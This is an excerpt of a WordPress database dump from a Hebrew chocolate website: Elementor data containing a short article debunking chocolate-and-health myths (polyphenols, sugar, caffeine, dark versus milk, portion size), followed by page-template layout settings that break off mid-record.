\\u05d7\\u05d5\\u05d3\\u05e9 \\u05de\\u05ea\\u05e4\\u05e8\\u05e1\\u05de\\u05d5\\u05ea \\u05d1\\u05ea\\u05e7\\u05e9\\u05d5\\u05e8\\u05ea \\\"\\u05e2\\u05d5\\u05d1\\u05d3\\u05d5\\u05ea\\\" \\u05d7\\u05d3\\u05e9\\u05d5\\u05ea \\u05d4\\u05e0\\u05d5\\u05d2\\u05e2\\u05d5\\u05ea \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3. \\u05d1\\u05d7\\u05d5\\u05d3\\u05e9 \\u05d0\\u05d7\\u05d3, \\u05d4\\u05e8\\u05d5\\u05e4\\u05d0\\u05d9\\u05dd \\u05d5\\u05d4\\u05de\\u05d3\\u05e2\\u05e0\\u05d9\\u05dd \\u05e7\\u05d5\\u05e8\\u05d0\\u05d9\\u05dd \\u05dc\\u05db\\u05d5\\u05dc\\u05e0\\u05d5 \\u05dc\\u05d4\\u05e4\\u05e1\\u05d9\\u05e7 \\u05db\\u05dc\\u05d9\\u05dc \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05d5\\u05d1\\u05d7\\u05d5\\u05d3\\u05e9 \\u05e9\\u05dc\\u05d0\\u05d7\\u05e8\\u05d9\\u05d5, \\u05de\\u05e1\\u05ea\\u05d1\\u05e8 \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05dc\\u05d0 \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd \\u05de\\u05e1\\u05e4\\u05d9\\u05e7 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<\\/p><p>\\u05dc\\u05db\\u05df, \\u05d0\\u05d7\\u05ea \\u05d5\\u05dc\\u05ea\\u05de\\u05d9\\u05d3, \\u05d1\\u05d5\\u05d0\\u05d5 \\u05e0\\u05d7\\u05dc\\u05d9\\u05e3 \\u05d0\\u05ea \\u05d4\\u05de\\u05d9\\u05ea\\u05d5\\u05e1\\u05d9\\u05dd \\u05d4\\u05e0\\u05e4\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea, \\u05e2\\u05dd \\u05d4\\u05d0\\u05de\\u05ea. \\u05e8\\u05de\\u05d6: \\u05db\\u05de\\u05d5 \\u05d1\\u05db\\u05dc \\u05d3\\u05d1\\u05e8 \\u05d0\\u05d7\\u05e8 \\u05d1\\u05d7\\u05d9\\u05d9\\u05dd, \\u05de\\u05d9\\u05dc\\u05ea \\u05d4\\u05de\\u05e4\\u05ea\\u05d7 \\u05d4\\u05d9\\u05d0 \\u05de\\u05ea\\u05d9\\u05e0\\u05d5\\u05ea.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d8\\u05d5\\u05d1 \\u05dc\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea<\\/strong><\\/h2><p>\\u05e4\\u05d5\\u05dc\\u05d9 \\u05e7\\u05e7\\u05d0\\u05d5, \\u05d4\\u05de\\u05e8\\u05db\\u05d9\\u05d1 \\u05d4\\u05e2\\u05d9\\u05e7\\u05e8\\u05d9 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05db\\u05dc\\u05d9\\u05dd \\u05e4\\u05d5\\u05dc\\u05d9\\u05e4\\u05e0\\u05d5\\u05dc\\u05d9\\u05dd \\u05d8\\u05d1\\u05e2\\u05d9\\u05d9\\u05dd. \\u05e8\\u05d0\\u05d9\\u05d5\\u05ea \\u05de\\u05d3\\u05e2\\u05d9\\u05d5\\u05ea \\u05de\\u05d5\\u05db\\u05d9\\u05d7\\u05d5\\u05ea \\u05e9\\u05e8\\u05db\\u05d9\\u05d1\\u05d9\\u05dd \\u05d0\\u05dc\\u05d5 \\u05de\\u05e1\\u05d9\\u05d9\\u05e2\\u05d9\\u05dd \\u05dc\\u05d4\\u05e4\\u05d7\\u05ea\\u05ea \\u05dc\\u05d7\\u05e5 \\u05d4\\u05d3\\u05dd \\u05d1\\u05e9\\u05dc \\u05d4\\u05ea\\u05db\\u05d5\\u05e0\\u05d5\\u05ea \\u05e0\\u05d5\\u05d2\\u05d3\\u05d5\\u05ea \\u05d4\\u05d7\\u05de\\u05e6\\u05d5\\u05df \\u05e9\\u05dc\\u05d4\\u05dd.<\\/p><p>\\u05d0\\u05da \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05db\\u05d9\\u05dc \\u05d2\\u05dd \\u05e8\\u05de\\u05d5\\u05ea \\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc \\u05e1\\u05d5\\u05db\\u05e8 \\u05d5\\u05e9\\u05d5\\u05de\\u05df \\u05e8\\u05d5\\u05d5\\u05d9. \\u05d6\\u05d4\\u05d5 \\u05d4\\u05de\\u05db\\u05d9\\u05dc \\u05e8\\u05de\\u05d5\\u05ea \\u05d2\\u05d1\\u05d5\\u05d4\\u05d5\\u05ea \\u05e9\\u05dc \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05d3\\u05d9 \\u05de\\u05de\\u05e0\\u05d5 \\u05e2\\u05dc\\u05d5\\u05dc \\u05dc\\u05d2\\u05e8\\u05d5\\u05dd \\u05dc\\u05de\\u05e9\\u05e7\\u05dc \\u05e2\\u05d5\\u05d3\\u05e3, \\u05d5\\u05d4\\u05d2\\u05d1\\u05e8\\u05ea \\u05d4\\u05e1\\u05d9\\u05db\\u05d5\\u05df \\u05dc\\u05de\\u05d7\\u05dc\\u05d5\\u05ea \\u05dc\\u05d1 \\u05d5\\u05db\\u05dc\\u05d9 \\u05d3\\u05dd.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e0\\u05d5\\u05ea\\u05df \\u05d0\\u05e0\\u05e8\\u05d2\\u05d9\\u05d4<\\/strong><\\/h2><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05db\\u05d9\\u05dc \\u05db\\u05de\\u05d5\\u05d9\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\u05e9\\u05dc \\u05e7\\u05e4\\u05d0\\u05d9\\u05df, \\u05e9\\u05e2\\u05e9\\u05d5\\u05d9 \\u05dc\\u05ea\\u05e8\\u05d5\\u05dd \\u05dc\\u05e8\\u05e2\\u05d9\\u05d5\\u05df \\u05e9\\u05d4\\u05d5\\u05d0 \\u05de\\u05d2\\u05d1\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05d0\\u05e0\\u05e8\\u05d2\\u05d9\\u05d4 \\u05d1\\u05d2\\u05d5\\u05e3. \\u05d1\\u05e2\\u05d5\\u05d3 \\u05e9\\u05d6\\u05d4 \\u05e0\\u05db\\u05d5\\u05df, \\u05de\\u05d5\\u05de\\u05dc\\u05e5 \\u05dc\\u05d1\\u05d7\\u05d5\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05de\\u05e1\\u05e4\\u05e7\\u05d9\\u05dd \\u05e9\\u05d7\\u05e8\\u05d5\\u05e8 \\u05d0\\u05e0\\u05e8\\u05d2\\u05d9\\u05d4 \\u05de\\u05ea\\u05de\\u05e9\\u05db\\u05ea, \\u05d5\\u05d4\\u05de\\u05db\\u05d9\\u05dc\\u05d9\\u05dd \\u05e4\\u05d7\\u05d5\\u05ea \\u05e1\\u05d5\\u05db\\u05e8 \\u05d5\\u05e9\\u05d5\\u05de\\u05df.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05d1\\u05e8\\u05d9\\u05d0 \\u05d9\\u05d5\\u05ea\\u05e8 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05dc\\u05d1<\\/strong><\\/h2><p>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e8\\u05d9\\u05e8 \\u05de\\u05db\\u05d9\\u05dc \\u05d9\\u05d5\\u05ea\\u05e8 \\u05e7\\u05e7\\u05d0\\u05d5 \\u05de\\u05d5\\u05e6\\u05e7 \\u05d5\\u05d7\\u05de\\u05d0\\u05ea \\u05e7\\u05e7\\u05d0\\u05d5 \\u05de\\u05d0\\u05e9\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05dc\\u05d1, \\u05d0\\u05da \\u05db\\u05de\\u05d5\\u05ea \\u05d4\\u05e4\\u05d5\\u05dc\\u05d9\\u05e4 \\u05e0\\u05d5\\u05dc\\u05d9\\u05dd \\u05ea\\u05dc\\u05d5\\u05d9\\u05d4 \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05e9\\u05d1\\u05d5 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05e2\\u05d5\\u05d1\\u05d3, \\u05d5\\u05dc\\u05db\\u05df \\u05d7\\u05e9\\u05d5\\u05d1 \\u05dc\\u05d4\\u05ea\\u05de\\u05e7\\u05d3 \\u05d1\\u05d0\\u05d5\\u05e4\\u05df \\u05d4\\u05d9\\u05d9\\u05e6\\u05d5\\u05e8 \\u05e9\\u05dc \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<\\/p><p>\\u05d1\\u05de\\u05d4\\u05dc\\u05da \\u05ea\\u05d4\\u05dc\\u05d9\\u05da \\u05d4\\u05d9\\u05d9\\u05e6\\u05d5\\u05e8, \\u05e0\\u05d9\\u05e7\\u05d5\\u05d9, \\u05ea\\u05e1\\u05d9\\u05e1\\u05d4, \\u05d6\\u05de\\u05df \\u05e6\\u05dc\\u05d9\\u05d9\\u05d4 \\u05d5\\u05d8\\u05de\\u05e4\\u05e8\\u05d8\\u05d5\\u05e8\\u05d4, \\u05ea\\u05d5\\u05e1\\u05e4\\u05ea \\u05d0\\u05dc\\u05e7\\u05dc\\u05d9\\u05d6\\u05e6\\u05d9\\u05d4 \\u05d5\\u05d4\\u05d5\\u05e1\\u05e4\\u05ea \\u05de\\u05e8\\u05db\\u05d9\\u05d1\\u05d9\\u05dd \\u05e0\\u05d5\\u05e1\\u05e4\\u05d9\\u05dd \\u05dc\\u05e7\\u05e7\\u05d0\\u05d5, \\u05db\\u05d2\\u05d5\\u05df \\u05e1\\u05d5\\u05db\\u05e8 \\u05dc\\u05de\\u05e9\\u05dc, \\u05de\\u05e1\\u05d9\\u05e8\\u05d9\\u05dd \\u05db\\u05de\\u05e2\\u05d8 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e4\\u05d5\\u05dc\\u05d9\\u05e4 \\u05e0\\u05d5\\u05dc\\u05d9\\u05dd \\u05de\\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05de\\u05e8\\u05d9\\u05e8.<\\/p><h2><strong>\\u05d7\\u05d8\\u05d9\\u05e3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e7\\u05d8\\u05df \\u05d0\\u05d7\\u05d3 \\u05d1\\u05d9\\u05d5\\u05dd \\u05dc\\u05d0 \\u05de\\u05d6\\u05d9\\u05e7 \\u05dc\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea<\\/strong><\\/h2><p>\\u05e0\\u05db\\u05d5\\u05df. \\u05db\\u05dc \\u05e2\\u05d5\\u05d3 \\u05de\\u05e1\\u05ea\\u05e4\\u05e7\\u05d9\\u05dd \\u05d1\\u05d7\\u05d8\\u05d9\\u05e3 \\u05e7\\u05d8\\u05df \\u05d6\\u05d4 \\u05d1\\u05dc\\u05d1\\u05d3. \\u05d7\\u05de\\u05d9\\u05e9\\u05d4 \\u05d7\\u05d8\\u05d9\\u05e4\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05dd, \\u05dc\\u05de\\u05e9\\u05dc, \\u05d9\\u05d5\\u05d1\\u05d9\\u05dc\\u05d5 \\u05dc\\u05e2\\u05dc\\u05d9\\u05d9\\u05d4 \\u05d1\\u05de\\u05e9\\u05e7\\u05dc. \\u05d7\\u05d8\\u05d9\\u05e3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d0\\u05d7\\u05d3 \\u05de\\u05db\\u05d9\\u05dc \\u05d1\\u05de\\u05de\\u05d5\\u05e6\\u05e2 250 \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05db\\u05de\\u05e2\\u05d8 \\u05e8\\u05d1\\u05e2 \\u05de\\u05e6\\u05e8\\u05d9\\u05db\\u05ea \\u05d4\\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea \\u05d4\\u05de\\u05d5\\u05de\\u05dc\\u05e6\\u05ea \\u05d1\\u05d9\\u05d5\\u05dd.<\\/p><p>\\u05dc\\u05db\\u05df, \\u05d1\\u05de\\u05e7\\u05d5\\u05dd \\u05d7\\u05d8\\u05d9\\u05e3 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05d5\\u05de\\u05dc\\u05e5 \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05e9\\u05dc\\u05d5\\u05e9 \\u05e7\\u05d5\\u05d1\\u05d9\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\u05d1\\u05d9\\u05d5\\u05dd, \\u05d4\\u05de\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05d1\\u05e1\\u05d1\\u05d9\\u05d1\\u05d5\\u05ea 30-50 \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea, \\u05d5\\u05d1\\u05db\\u05da \\u05dc\\u05e1\\u05e4\\u05e7 \\u05d0\\u05ea \\u05d4\\u05ea\\u05e9\\u05d5\\u05e7\\u05d4 \\u05dc\\u05de\\u05e9\\u05d4\\u05d5 \\u05de\\u05ea\\u05d5\\u05e7, \\u05de\\u05d1\\u05dc\\u05d9 \\u05dc\\u05e1\\u05db\\u05df \\u05d0\\u05ea \\u05d4\\u05d1\\u05e8\\u05d9\\u05d0\\u05d5\\u05ea \\u05d0\\u05d5 \\u05dc\\u05d4\\u05d5\\u05e1\\u05d9\\u05e3 \\u05dc\\u05de\\u05e9\\u05e7\\u05dc.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05de\\u05db\\u05e8<\\/strong><\\/h2><p>\\u05e0\\u05db\\u05d5\\u05df. \\u05d0\\u05d1\\u05dc \\u05d1\\u05d0\\u05d5\\u05ea\\u05d4 \\u05de\\u05d9\\u05d3\\u05d4 \\u05d2\\u05dd \\u05d0\\u05e4\\u05e8\\u05e1\\u05e7\\u05d9\\u05dd, \\u05dc\\u05de\\u05e9\\u05dc, \\u05d9\\u05db\\u05d5\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05d5\\u05d1\\u05d9\\u05dc \\u05dc\\u05d4\\u05ea\\u05de\\u05db\\u05e8\\u05d5\\u05ea \\u05d0\\u05dd \\u05dc\\u05d0 \\u05de\\u05e4\\u05e1\\u05d9\\u05e7\\u05d9\\u05dd \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05d5\\u05ea\\u05dd. \\u05dc\\u05db\\u05df \\u05d7\\u05e9\\u05d5\\u05d1 \\u05dc\\u05d4\\u05d1\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05d2\\u05d9\\u05e8\\u05d5\\u05d9\\u05d9\\u05dd \\u05d4\\u05de\\u05d5\\u05d1\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05ea\\u05de\\u05db\\u05e8\\u05d5\\u05ea. \\u05d4\\u05e8\\u05d2\\u05e9\\u05d5\\u05ea \\u05dc\\u05d2\\u05d1\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05dd \\u05d4\\u05de\\u05db\\u05ea\\u05d9\\u05d1\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05d4\\u05ea\\u05e0\\u05d4\\u05d2\\u05d5\\u05ea, \\u05d4\\u05de\\u05d5\\u05d1\\u05d9\\u05dc\\u05d4 \\u05dc\\u05d7\\u05e9\\u05d9\\u05d1\\u05d4 \\u05d4\\u05de\\u05e7\\u05e9\\u05e8\\u05ea \\u05d0\\u05db\\u05d9\\u05dc\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e2\\u05dd \\u05ea\\u05d7\\u05d5\\u05e9\\u05ea \\u05e0\\u05d5\\u05d7\\u05d5\\u05ea, \\u05ea\\u05d2\\u05de\\u05d5\\u05dc \\u05d5\\u05d7\\u05d2\\u05d9\\u05d2\\u05d4.<\\/p><p>\\u05d4\\u05e7\\u05e9\\u05e8 \\u05d4\\u05d6\\u05d4 \\u05de\\u05db\\u05ea\\u05d9\\u05d1 \\u05d0\\u05ea \\u05d4\\\"\\u05e6\\u05d5\\u05e8\\u05da\\\" \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3, \\u05de\\u05d4 \\u05e9\\u05e2\\u05dc\\u05d5\\u05dc \\u05dc\\u05d4\\u05e7\\u05e9\\u05d5\\u05ea \\u05e2\\u05dc \\u05d4\\u05e9\\u05dc\\u05d9\\u05d8\\u05d4 \\u05d1\\u05db\\u05de\\u05d5\\u05d9\\u05d5\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d0\\u05ea\\u05dd \\u05d0\\u05d5\\u05db\\u05dc\\u05d9\\u05dd.<\\/p><h2><strong>\\u05e9\\u05d5\\u05e7\\u05d5 \\u05d7\\u05dd \\u05dc\\u05d0 \\u05e0\\u05d7\\u05e9\\u05d1<\\/strong><\\/h2><p>\\u05d0\\u05d1\\u05e7\\u05ea \\u05e7\\u05e7\\u05d0\\u05d5 \\u05d4\\u05de\\u05e9\\u05de\\u05e9\\u05ea \\u05dc\\u05d4\\u05db\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d7\\u05dd \\u05de\\u05db\\u05d9\\u05dc\\u05d4 \\u05e4\\u05d7\\u05d5\\u05ea \\u05e9\\u05d5\\u05de\\u05df, \\u05db\\u05d9 \\u05d0\\u05d9\\u05e0\\u05d4 \\u05db\\u05d5\\u05dc\\u05dc\\u05ea \\u05d7\\u05de\\u05d0\\u05ea \\u05e7\\u05e7\\u05d0\\u05d5 \\u05d5\\u05e9\\u05d5\\u05de\\u05e0\\u05d9\\u05dd \\u05d0\\u05d7\\u05e8\\u05d9\\u05dd \\u05e9\\u05e0\\u05de\\u05e6\\u05d0\\u05d9\\u05dd \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3.<\\/p><p>\\u05d0\\u05dc\\u05d0 \\u05e9\\u05d7\\u05e9\\u05d5\\u05d1 \\u05dc\\u05ea\\u05ea \\u05d0\\u05ea \\u05d4\\u05d3\\u05e2\\u05ea \\u05d2\\u05dd \\u05e2\\u05dc \\u05de\\u05d4 \\u05e9\\u05de\\u05d5\\u05e1\\u05d9\\u05e4\\u05d9\\u05dd \\u05dc\\u05de\\u05e9\\u05e7\\u05d4 \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5 \\u05d4\\u05d7\\u05dd. \\u05db\\u05da, \\u05dc\\u05de\\u05e9\\u05dc, \\u05d0\\u05dd \\u05de\\u05d5\\u05e1\\u05d9\\u05e4\\u05d9\\u05dd \\u05dc\\u05d5 \\u05e1\\u05d5\\u05db\\u05e8, \\u05e7\\u05e6\\u05e4\\u05ea \\u05d5\\u05e2\\u05d5\\u05d3 \\u05e7\\u05e6\\u05ea \\u05e4\\u05d9\\u05e8\\u05d5\\u05e8\\u05d9 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05dc\\u05de\\u05e2\\u05dc\\u05d4, \\u05d1\\u05e9\\u05d1\\u05d9\\u05dc \\u05d4\\u05d8\\u05e2\\u05dd, \\u05de\\u05e7\\u05d1\\u05dc\\u05d9\\u05dd \\u05de\\u05e9\\u05e7\\u05d4 \\u05e2\\u05ea\\u05d9\\u05e8 \\u05e7\\u05dc\\u05d5\\u05e8\\u05d9\\u05d5\\u05ea. \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3 \\u05d0\\u05dd \\u05e9\\u05d5\\u05ea\\u05d9\\u05dd \\u05d0\\u05d5\\u05ea\\u05d5 \\u05e2\\u05dd \\u05db\\u05de\\u05d4 \\u05e2\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\u05dc\\u05d9\\u05d3.<\\/p><p>Read <a href=\\\"https:\\/\\/html-online.com\\/articles\\/\\\">HTML code related articles<\\/a> on our blog to get the best tips on web content composing.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(863,178,'_elementor_version','0.4'),(864,178,'_thumbnail_id','177'),(865,174,'_yoast_wpseo_primary_category','7'),(868,179,'_elementor_template_type','single'),(869,179,'_elementor_edit_mode','builder'),(870,179,'_wp_page_template','default'),(871,179,'_elementor_page_settings','a:1:{s:13:\"page_template\";s:16:\"elementor_canvas\";}'),(872,179,'_elementor_data','[{\"id\":\"5143e12f\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":180},\"content_position\":\"middle\",\"background_background\":\"classic\",\"background_color\":\"#ffffff\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"height\":\"min-height\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\",\"custom_height_mobile\":{\"unit\":\"px\",\"size\":80},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"custom_height_tablet\":{\"unit\":\"px\",\"size\":124}},\"elements\":[{\"id\":\"71c4466d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"_inline_size_mobile\":30,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"5c8ffdc1\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"site-logo\\\" settings=\\\"%7B%7D\\\"]\",\"link\":\"[elementor-tag id=\\\"\\\" name=\\\"site-url\\\" settings=\\\"%7B%7D\\\"]\"},\"width\":{\"unit\":\"px\",\"size\":120},\"width_mobile\":{\"unit\":\"px\",\"size\":80},\"align_mobile\":\"left\",\"image\":{\"id\":\"38\",\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/placeholder.png\"},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"theme-site-logo\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"48141d39\",\"elType\":\"section\",\"settings\":{\"background_background\":\"gradient\",\"background_color\":\"#e8e8e8\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"0\",\"left\":\"60\",\"isLinked\":false},\"gap\":\"no\",\"background_color_b\":\"#f4f4f4\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"20\",\"bottom\":\"10\",\"left\":\"20\",\"isLinked\":false},\"sticky\":\"top\"},\"elements\":[{\"id\":\"50bf4905\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size_mobile\":100},\"elements\":[{\"id\":\"d5a34b\",\"elType\":\"widget\",\"settings\":{\"align_items\":\"justify\",\"animation_line\":\"grow\",\"animation_text\":\"none\",\"color_menu_item\":\"#7a7a7a\",\"color_menu_item_hover\":\"#ffffff\",\"pointer_color_menu_item_hover\":\"#692910\",\"menu_typography_typography\":\"custom\",\"menu_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"pointer_width\":{\"unit\":\"px\",\"size\":3},\"color_dropdown_item\":\"#000000\",\"background_color_dropdown_item\":\"#f2f2f2\",\"color_dropdown_item_hover\":\"#02d3c9\",\"background_color_dropdown_item_hover\":\"#ededed\",\"dropdown_typography_typography\":\"custom\",\"dropdown_typography_font_size\":{\"unit\":\"px\",\"size\":15},\"toggle_color\":\"#02d3c9\",\"toggle_color_hover\":\"#54595f\",\"toggle_size\":{\"unit\":\"px\",\"size\":30},\"toggle_border_width\":{\"unit\":\"px\",\"size\":0},\"toggle_border_radius\":{\"unit\":\"px\",\"size\":0},\"pointer\":\"background\",\"menu_typography_text_transform\":\"uppercase\",\"dropdown\":\"mobile\",\"full_width\":\"stretch\",\"color_menu_item_active\":\"#ffffff\",\"animation_background\":\"sweep-down\",\"padding_vertical_menu_item\":{\"unit\":\"px\",\"size\":18},\"toggle_background_color\":\"rgba(0,0,0,0)\"},\"elements\":[],\"widgetType\":\"nav-menu\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7c736ec\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"081917e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d8afb22\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"60b32fa\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"f297d92\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"1154d95\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"title\":\"[elementor-tag id=\\\"\\\" name=\\\"post-title\\\" settings=\\\"%7B%22before%22%3A%22%22%2C%22after%22%3A%22%22%2C%22fallback%22%3A%22%22%7D\\\"]\"},\"title\":\"\\u05db\\u05ea\\u05d5\\u05d1 \\u05d0\\u05ea \\u05d4\\u05db\\u05d5\\u05ea\\u05e8\\u05ea \\u05db\\u05d0\\u05df\"},\"elements\":[],\"widgetType\":\"theme-post-title\"},{\"id\":\"5797de9\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"type\":\"author\",\"icon\":\"fa fa-user-circle-o\",\"_id\":\"0e28084\",\"date_format\":\"default\",\"custom_date_format\":\"F j, Y\",\"time_format\":\"default\",\"custom_time_format\":\"g:i a\",\"taxonomy\":[],\"text_prefix\":\"\\u05e0\\u05db\\u05ea\\u05d1 \\u05e2\\\"\\u05d9 \",\"show_avatar\":\"\",\"avatar_size\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"comments_custom_strings\":\"\",\"string_no_comments\":\"\",\"string_one_comment\":\"\",\"string_comments\":\"\",\"link\":\"\",\"show_icon\":\"default\"},{\"type\":\"date\",\"icon\":\"fa fa-calendar\",\"_id\":\"b1560e5\",\"date_format\":\"3\",\"custom_date_format\":\"F j, Y\",\"time_format\":\"default\",\"custom_time_format\":\"g:i a\",\"taxonomy\":[],\"text_prefix\":\"\",\"show_avatar\":\"\",\"avatar_size\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"comments_custom_strings\":\"\",\"string_no_comments\":\"\",\"string_one_comment\":\"\",\"string_comments\":\"\",\"link\":\"yes\",\"show_icon\":\"default\"},{\"type\":\"time\",\"icon\":\"fa fa-clock-o\",\"_id\":\"2e36932\",\"date_format\":\"default\",\"custom_date_format\":\"F j, Y\",\"time_format\":\"default\",\"custom_time_format\":\"g:i a\",\"taxonomy\":[],\"text_prefix\":\"\",\"show_avatar\":\"\",\"avatar_size\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_tablet\":{\"unit\":\"px\",\"size\":\"\"},\"avatar_size_mobile\":{\"unit\":\"px\",\"size\":\"\"},\"comments_custom_strings\":\"\",\"string_no_comments\":\"\",\"string_one_comment\":\"\",\"string_comments\":\"\",\"link\":\"yes\",\"show_icon\":\"default\"}]},\"elements\":[],\"widgetType\":\"post-info\"},{\"id\":\"f3418e3\",\"elType\":\"widget\",\"settings\":{\"__dynamic__\":{\"image\":\"[elementor-tag id=\\\"\\\" name=\\\"post-featured-image\\\" 